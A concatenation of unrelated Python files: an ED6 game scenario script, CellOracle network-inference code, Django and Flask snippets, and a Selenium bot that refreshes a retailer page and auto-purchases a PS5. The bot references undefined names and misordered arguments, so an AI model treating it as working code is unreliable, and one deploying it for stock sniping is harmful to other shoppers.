print expParams,format(float(M),'.3f'),format(int(R),'03d'),format(100*float(M)/float(R),'.3f')
expParams = []
## for file in glob.glob(path+str(i)+"_*"):
## config = ConfigParser()
## config.read(file+'/input_configuration_second_layer')
## batch_size = config.getint('MAIN_PARAMETER_SETTING','batch_size')
## expParams.append(batch_size)
## k = config.getint('MAIN_PARAMETER_SETTING','k') # steps in CDk
## expParams.append(k)
## n_hidden = config.getint('MODEL_PARAMETER_SETTING','n_hidden')
## expParams.append(delay)
## learning_rate = config.getfloat('MODEL_PARAMETER_SETTING','learning_rate')
## expParams.append(learning_rate)
## n_gibbs_generate = config.getint('MODEL_PARAMETER_SETTING','n_gibbs_generate') # Gibbs iterations when generating predictions
## expParams.append(n_gibbs_generate)
## print '-->',expParams
## expParams = []
|
from ED6ScenarioHelper import *
def main():
# 古罗尼山道
CreateScenaFile(
FileName = 'C1500 ._SN',
MapName = 'Bose',
Location = 'C1500.x',
MapIndex = 61,
MapDefaultBGM = "ed60022",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'ED6_DT01/C1500 ._SN',
'ED6_DT01/C1500_1 ._SN',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'魔兽', # 9
'魔兽', # 10
'魔兽', # 11
'魔兽', # 12
'魔兽', # 13
'魔兽', # 14
'魔兽', # 15
'魔兽', # 16
'照相机', # 17
'艾丝蒂尔', # 18
'约修亚', # 19
'雪拉扎德', # 20
'古罗尼山道·关所方向', # 21
'西柏斯街道方向', # 22
)
DeclEntryPoint(
Unknown_00 = -130600,
Unknown_04 = -40,
Unknown_08 = 178500,
Unknown_0C = 4,
Unknown_0E = 225,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 260,
Unknown_32 = 240,
Unknown_34 = 300,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 61,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT09/CH10140 ._CH', # 00
'ED6_DT09/CH10141 ._CH', # 01
'ED6_DT07/CH00100 ._CH', # 02
'ED6_DT07/CH00110 ._CH', # 03
'ED6_DT07/CH00120 ._CH', # 04
'ED6_DT07/CH00101 ._CH', # 05
'ED6_DT07/CH00111 ._CH', # 06
'ED6_DT07/CH00121 ._CH', # 07
'ED6_DT07/CH00102 ._CH', # 08
'ED6_DT09/CH10200 ._CH', # 09
'ED6_DT09/CH10201 ._CH', # 0A
'ED6_DT09/CH10880 ._CH', # 0B
'ED6_DT09/CH10881 ._CH', # 0C
'ED6_DT09/CH11160 ._CH', # 0D
'ED6_DT09/CH11161 ._CH', # 0E
'ED6_DT09/CH10870 ._CH', # 0F
'ED6_DT09/CH10871 ._CH', # 10
)
AddCharChipPat(
'ED6_DT09/CH10140P._CP', # 00
'ED6_DT09/CH10141P._CP', # 01
'ED6_DT07/CH00100P._CP', # 02
'ED6_DT07/CH00110P._CP', # 03
'ED6_DT07/CH00120P._CP', # 04
'ED6_DT07/CH00101P._CP', # 05
'ED6_DT07/CH00111P._CP', # 06
'ED6_DT07/CH00121P._CP', # 07
'ED6_DT07/CH00102P._CP', # 08
'ED6_DT09/CH10200P._CP', # 09
'ED6_DT09/CH10201P._CP', # 0A
'ED6_DT09/CH10880P._CP', # 0B
'ED6_DT09/CH10881P._CP', # 0C
'ED6_DT09/CH11160P._CP', # 0D
'ED6_DT09/CH11161P._CP', # 0E
'ED6_DT09/CH10870P._CP', # 0F
'ED6_DT09/CH10871P._CP', # 10
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 2,
ChipIndex = 0x2,
NpcIndex = 0x1C1,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 3,
ChipIndex = 0x3,
NpcIndex = 0x1C1,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 4,
ChipIndex = 0x4,
NpcIndex = 0x1C1,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -140810,
Z = 6010,
Y = -31010,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -119390,
Z = -60,
Y = 180920,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 15,
ChipIndex = 0xF,
NpcIndex = 0x1C5,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclMonster(
X = -146390,
Z = 2009,
Y = 152190,
Unknown_0C = 0,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCA,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -148000,
Z = 2090,
Y = 136280,
Unknown_0C = 0,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCD,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -154200,
Z = 1990,
Y = 120790,
Unknown_0C = 0,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -154710,
Z = 4070,
Y = 99880,
Unknown_0C = 58,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -154180,
Z = 4030,
Y = 76310,
Unknown_0C = 117,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCF,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -162330,
Z = 4019,
Y = 46020,
Unknown_0C = 116,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCD,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -135360,
Z = 3950,
Y = 20570,
Unknown_0C = 99,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -131150,
Z = 2040,
Y = 55190,
Unknown_0C = 57,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -151910,
Z = 5910,
Y = -11960,
Unknown_0C = 0,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCD,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclEvent(
X = -143900,
Y = 2800,
Z = 74200,
Range = 2000,
Unknown_10 = 0x4B0,
Unknown_14 = 0x0,
Unknown_18 = 0x10040,
Unknown_1C = 0,
)
DeclActor(
TriggerX = -123590,
TriggerZ = 4010,
TriggerY = 89800,
TriggerRange = 1000,
ActorX = -122930,
ActorZ = 5010,
ActorY = 89680,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 3,
Unknown_22 = 0,
)
DeclActor(
TriggerX = -128169,
TriggerZ = 4130,
TriggerY = 22090,
TriggerRange = 1000,
ActorX = -127650,
ActorZ = 5630,
ActorY = 22150,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 4,
Unknown_22 = 0,
)
ScpFunction(
"Function_0_476", # 00, 0
"Function_1_477", # 01, 1
"Function_2_4D5", # 02, 2
"Function_3_4EB", # 03, 3
"Function_4_633", # 04, 4
)
def Function_0_476(): pass
label("Function_0_476")
Return()
# Function_0_476 end
def Function_1_477(): pass
label("Function_1_477")
OP_16(0x2, 0xFA0, 0xFFFBED08, 0xFFFF2540, 0x3003E)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_49B")
OP_6F(0x0, 0)
Jump("loc_4A2")
label("loc_49B")
OP_6F(0x0, 60)
label("loc_4A2")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4B4")
OP_6F(0x1, 0)
Jump("loc_4BB")
label("loc_4B4")
OP_6F(0x1, 60)
label("loc_4BB")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4CD")
OP_6F(0x0, 0)
Jump("loc_4D4")
label("loc_4CD")
OP_6F(0x0, 60)
label("loc_4D4")
Return()
# Function_1_477 end
def Function_2_4D5(): pass
label("Function_2_4D5")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_4EA")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_2_4D5")
label("loc_4EA")
Return()
# Function_2_4D5 end
def Function_3_4EB(): pass
label("Function_3_4EB")
SetMapFlags(0x8000000)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5DA")
OP_22(0x2B, 0x0, 0x64)
OP_70(0x0, 0x3C)
Sleep(500)
Jc((scpexpr(EXPR_EXEC_OP, "OP_3E(0x1F5, 1)"), scpexpr(EXPR_END)), "loc_561")
FadeToDark(300, 0, 100)
OP_22(0x11, 0x0, 0x64)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x0),
"得到了\x07\x02",
"回复药\x07\x00",
"。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
SetMessageWindowPos(72, 320, 56, 3)
FadeToBright(300, 0)
OP_A2(0x372)
Jump("loc_5D7")
label("loc_561")
FadeToDark(300, 0, 100)
SetChrName("")
AnonymousTalk(
(
"宝箱里装有\x07\x02",
"回复药\x07\x00",
"。\x01",
"不过现有的数量太多,\x07\x02",
"回复药\x07\x00",
"不能再拿更多了。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_22(0x2C, 0x0, 0x64)
OP_6F(0x0, 60)
OP_70(0x0, 0x0)
label("loc_5D7")
Jump("loc_625")
label("loc_5DA")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"宝箱里什么东西都没有。\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_83(0xF, 0x17)
label("loc_625")
Sleep(30)
TalkEnd(0xFF)
ClearMapFlags(0x8000000)
Return()
# Function_3_4EB end
def Function_4_633(): pass
label("Function_4_633")
SetMapFlags(0x8000000)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_7EE")
OP_22(0x2B, 0x0, 0x64)
OP_70(0x1, 0x3C)
Sleep(500)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x72, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_715")
OP_9F(0x16, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
SetChrPos(0x16, -128169, 4130, 22090, 320)
TurnDirection(0x16, 0x0, 0)
def lambda_682():
OP_8F(0xFE, 0xFFFE0B57, 0x1022, 0x564A, 0x4B0, 0x0)
ExitThread()
QueueWorkItem(0x16, 1, lambda_682)
def lambda_69D():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x4B0)
ExitThread()
QueueWorkItem(0x16, 2, lambda_69D)
ClearChrFlags(0x16, 0x80)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"魔兽出现了!\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
Battle(0xD0, 0x0, 0x0, 0x0, 0xFF)
SetChrFlags(0x16, 0x80)
Switch(
(scpexpr(EXPR_PUSH_VALUE_INDEX, 0x3), scpexpr(EXPR_END)),
(0, "loc_6F0"),
(2, "loc_702"),
(1, "loc_712"),
(SWITCH_DEFAULT, "loc_715"),
)
label("loc_6F0")
OP_A2(0x396)
OP_6F(0x1, 60)
Sleep(500)
Jump("loc_715")
label("loc_702")
OP_6F(0x1, 0)
TalkEnd(0xFF)
ClearMapFlags(0x8000000)
Return()
label("loc_712")
OP_B4(0x0)
Return()
label("loc_715")
Jc((scpexpr(EXPR_EXEC_OP, "OP_3E(0x133, 1)"), scpexpr(EXPR_END)), "loc_76F")
FadeToDark(300, 0, 100)
OP_22(0x11, 0x0, 0x64)
SetMessageWindowPos(-1, -1, -1, -1)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x0),
"得到了\x07\x02",
"珍珠耳环\x07\x00",
"。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
SetMessageWindowPos(72, 320, 56, 3)
FadeToBright(300, 0)
OP_A2(0x373)
Jump("loc_7EB")
label("loc_76F")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
"宝箱里装有\x07\x02",
"珍珠耳环\x07\x00",
"。\x01",
"不过现有的数量太多,\x07\x02",
"珍珠耳环\x07\x00",
"不能再拿更多了。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_22(0x2C, 0x0, 0x64)
OP_6F(0x1, 60)
OP_70(0x1, 0x0)
label("loc_7EB")
Jump("loc_832")
label("loc_7EE")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"宝箱里什么东西都没有。\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_83(0xF, 0x18)
label("loc_832")
Sleep(30)
TalkEnd(0xFF)
ClearMapFlags(0x8000000)
Return()
# Function_4_633 end
SaveToFile()
Try(main)
|
# -*- coding: utf-8 -*-
'''
This is a series of custom functions for the inferring of GRN from single cell RNA-seq data.
Codes were written by Kenji Kamimoto.
'''
###########################
### 0. Import libralies ###
###########################
# 0.1. libraries for fundamental data science and data processing
import os
import numpy as np
import pandas as pd
from scipy import stats
from tqdm.notebook import tqdm
from ..network.net_core import Net
from ..utility import standard
from .links_object import Links
from ..trajectory.oracle_utility import _adata_to_df, _get_clustercolor_from_anndata
RIDGE_SOLVER = "auto"
########################################
### Construct cluster specific GRNs ###
########################################
def get_links(oracle_object, cluster_name_for_GRN_unit=None, alpha=10, bagging_number=20, verbose_level=1, test_mode=False, model_method="bagging_ridge"):
"""
Make GRN for each cluster and returns results as a Links object.
Several preprocessing should be done before using this function.
Args:
oracle_object (Oracle): See Oracle module for detail.
cluster_name_for_GRN_unit (str): Cluster name for GRN calculation. The cluster information should be stored in Oracle.adata.obs.
alpha (float or int): The strength of regularization.
If you set a lower value, the sensitivity increases, and you can detect weaker network connections. However, there may be more noise.
If you select a higher value, it will reduce the chance of overfitting.
bagging_number (int): The number used in bagging calculation.
verbose_level (int): if [verbose_level>1], most detailed progress information will be shown.
if [verbose_level > 0], one progress bar will be shown.
if [verbose_level == 0], no progress bar will be shown.
test_mode (bool): If test_mode is True, GRN calculation will be done for only one cluster rather than all clusters.
model_method (str): Chose modeling algorithm. "bagging_ridge" or "bayesian_ridge"
"""
if model_method not in ["bagging_ridge", "bayesian_ridge"]:
raise ValueError("model_mothod error. Please set 'bagging_ridge' or 'bayesian_ridge'.")
if cluster_name_for_GRN_unit is None:
cluster_name_for_GRN_unit = oracle_object.cluster_column_name
# calculate GRN for each cluster
linkLists = _fit_GRN_for_network_analysis(oracle_object, cluster_name_for_GRN_unit=cluster_name_for_GRN_unit,
alpha=alpha, bagging_number=bagging_number, verbose_level=verbose_level, test_mode=test_mode,
model_method=model_method)
# initiate links object
links = Links(name=cluster_name_for_GRN_unit,
links_dict=linkLists)
# extract color infomation
links.palette = _get_clustercolor_from_anndata(adata=oracle_object.adata,
cluster_name=cluster_name_for_GRN_unit,
return_as="palette")
#links.merge_links()
links.ALPHA_used = alpha
links.model_method = model_method
return links
def _fit_GRN_for_network_analysis(oracle_object, cluster_name_for_GRN_unit, alpha=10, bagging_number=20,
verbose_level=1, test_mode=False, model_method="bagging_ridge"):
# extract information from oracle_object
gem_imputed = _adata_to_df(oracle_object.adata, "imputed_count")
gem_imputed_std = standard(gem_imputed)
cluster_info = oracle_object.adata.obs[cluster_name_for_GRN_unit]
linkLists = {}
# setting about verbose
if verbose_level < 0:
raise ValueError("varbose_level should be positive number.")
elif verbose_level == 0:
loop = np.unique(cluster_info)
verbose = False
else:
loop = tqdm(np.unique(cluster_info))
if verbose_level <= 1:
verbose = False
else:
verbose = True
First = True
for cluster in loop:
if (not test_mode) | First:
First = False
if verbose:
print(f"inferring GRN for {cluster}...")
cells_in_the_cluster_bool = (cluster_info == cluster)
gem_ = gem_imputed[cells_in_the_cluster_bool]
gem_std = gem_imputed_std[cells_in_the_cluster_bool]
tn_ = Net(gene_expression_matrix=gem_,
gem_standerdized=gem_std,
TFinfo_dic=oracle_object.TFdict,
verbose=False)
tn_.fit_All_genes(bagging_number=bagging_number,
model_method=model_method,
alpha=alpha, verbose=verbose)
#oracle_object.linkMat[cluster] = tn_.returnResultAs_TGxTFs("coef_abs")
tn_.updateLinkList(verbose=False)
linkLists[cluster] = tn_.linkList.copy()
return linkLists
|
#!/usr/bin/env python
# -*- coding=utf-8 -*-
from django.db import models
# Create your models here.
class ServiceInfo(models.Model):
service=models.CharField(max_length=200,verbose_name="产品线")
cluster_name=models.CharField(max_length=200,verbose_name="集群名")
install_path=models.CharField(max_length=200,blank=True,verbose_name="安装路径")
def __str__(self):
return self.service+"_"+self.cluster_name
class FileInfo(models.Model):
service_info= models.ForeignKey(ServiceInfo)
salt_path=models.CharField(max_length=200,unique=True,verbose_name="git路径")
target_path=models.CharField(max_length=200,verbose_name="本地路径")
auth=models.CharField(max_length=200,verbose_name="权限")
user_group=models.CharField(max_length=200,verbose_name="属组")
user=models.CharField(max_length=200,verbose_name="用户")
md5=models.CharField(max_length=200,verbose_name="md5值")
update_time=models.CharField(max_length=200,verbose_name="更新时间")
def __str__(self):
return self.salt_path
class OperationRecord(models.Model):
salt_path=models.CharField(max_length=200,verbose_name="本地路径")
action=models.CharField(max_length=200,verbose_name="动作")
operate_time=models.CharField(max_length=200,verbose_name="操作时间")
file_info_id=models.CharField(max_length=200,verbose_name="文件id")
def __str__(self):
return self.salt_path
|
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class PrepaidGamer :
def __init__(self):
webOptions = webdriver.ChromeOptions()
webOptions.add_argument("start-maximized")
webOptions.add_argument("disable-infobars")
self.driver = webdriver.Chrome(executable_path=r"/pathtothechromedriver",options=options)
def login(self,email,password,url):
self.driver.get(url)
login_email = self.driver.find_element_by_xpath("//input[@id='username']")
login_email.send_keys(email)
login_password = self.driver.find_element_by_xpath("//input[@id='passsword']")
login_password.send_keys(password)
loginButton = self.driver.find_element_by_xpath("//button[(.)='Log in']")
loginButton.click()
time.sleep(1)
def addToCart(self,url):
self.driver.get(url)
addToCart = false
while not addToCart:
try:
addToCartButton = self.driver.find_element_by_xpath("//button[(.)='Add to cart']")
addToCartButton.click()
addToCart = True
except:
self.driver.refresh()
time.sleep(0.5)
def checkout(self,upi):
proceedToCheckout = self.driver.find_element_by_xpath("//a[contains(@class,'checkout') and contains((.),'Proceed to checkout')]")
proceedToCheckout.click()
time.sleep(1)
upiCheck = self.driver.find_element_by_xpath("//input[@id='payment_method_wc-upi']")
upiCheck.click()
time.sleep(0.5)
upiAddress = self.driver.find_element_by_xpath("//input[@id='upiwc-address']")
upiAddress.send_keys(upi)
payButton = self.driver.find_element_by_xpath("//button[(.)='Place Order']")
payButton.click()
if __name__=="__main__":
autoBuyBot = RelianceDigital()
email = ""
password = ""
upi = ""
autoBuyBot.login("https://prepaidgamercard.com/my-account/",email,password)
autoBuyBot.add_to_cart("https://prepaidgamercard.com/product/playstation-5-digital-edition-ps5/")
#use this for disc edition :
autoBuyBot.checkout(upi) |
a = 'This is test naive.py file...'
print (a) |
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
url(r'^$', 'aplicativo.views.home', name='home'),
url(r'^mostrarTab/(?P<namespace>\S+)/$', 'aplicativo.views.mostrar_tab', name='mostrarTab'),
# url(r'^trocas/', include('trocas.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
|
"""
Azure provides a set of services for Microsoft Azure provider.
"""
from diagrams import Node
class _Azure(Node):
_provider = "azure"
_icon_dir = "resources/azure"
fontcolor = "#ffffff"
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import mptt.fields
from django.conf import settings
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UserModel',
fields=[
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('is_superuser', models.BooleanField(help_text='Designates that this user has all permissions without explicitly assigning them.', default=False, verbose_name='superuser status')),
('email', models.EmailField(unique=True, verbose_name='email address', max_length=75, primary_key=True, serialize=False)),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
('is_staff', models.BooleanField(help_text='Designates whether the user can log into this admin site.', default=False, verbose_name='staff status')),
('validated_at', models.DateTimeField(editable=False, null=True, default=None, verbose_name='DateTime an account is validated')),
('is_active', models.BooleanField(help_text='Designates whether the active flag of the user. ', default=True, verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', to='auth.Group', related_query_name='user', related_name='user_set', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', to='auth.Permission', related_query_name='user', related_name='user_set', verbose_name='user permissions')),
],
options={
'swappable': 'AUTH_USER_MODEL',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('is_active', models.BooleanField(editable=False, default=True, verbose_name='Is the object active')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created time object')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Last time the object was updated')),
('title', models.CharField(verbose_name='Title', null=True, default=None, max_length=1024)),
('description', models.CharField(verbose_name='Description', null=True, default=None, max_length=20480)),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('created_by', models.ForeignKey(related_name='category_created', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='User who created the object')),
('parent', mptt.fields.TreeForeignKey(to='unavis.Category', null=True, blank=True, related_name='children')),
('updated_by', models.ForeignKey(related_name='category_updated', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='Last user who updated object')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('is_active', models.BooleanField(editable=False, default=True, verbose_name='Is the object active')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created time object')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Last time the object was updated')),
('title', models.CharField(verbose_name='Title', null=True, default=None, max_length=1024)),
('description', models.CharField(verbose_name='Description', null=True, default=None, max_length=20480)),
('slug', models.SlugField(editable=False, verbose_name='Slug')),
('category', models.ForeignKey(to='unavis.Category', editable=False, related_name='pages')),
('created_by', models.ForeignKey(related_name='page_created', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='User who created the object')),
('updated_by', models.ForeignKey(related_name='page_updated', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='Last user who updated object')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('is_active', models.BooleanField(editable=False, default=True, verbose_name='Is the object active')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created time object')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Last time the object was updated')),
('title', models.CharField(verbose_name='Title', null=True, default=None, max_length=1024)),
('description', models.CharField(verbose_name='Description', null=True, default=None, max_length=20480)),
('note', models.PositiveSmallIntegerField(default=0, verbose_name='Global note')),
('created_by', models.ForeignKey(related_name='review_created', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='User who created the object')),
('page', models.ForeignKey(to='unavis.Page')),
('updated_by', models.ForeignKey(related_name='review_updated', to=settings.AUTH_USER_MODEL, editable=False, verbose_name='Last user who updated object')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
|
#!/usr/bin/env python
# Author: Ben Langmead <ben.langmead@gmail.com>
# License: MIT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
|
from flask import Flask, render_template
app=Flask(__name__)
@app.route('/')
@app.route('/home')
def home():
return render_template('home.html',title='home')
@app.route('/jelly')
def jelly():
return render_template('jelly.html')
@app.route('/fish')
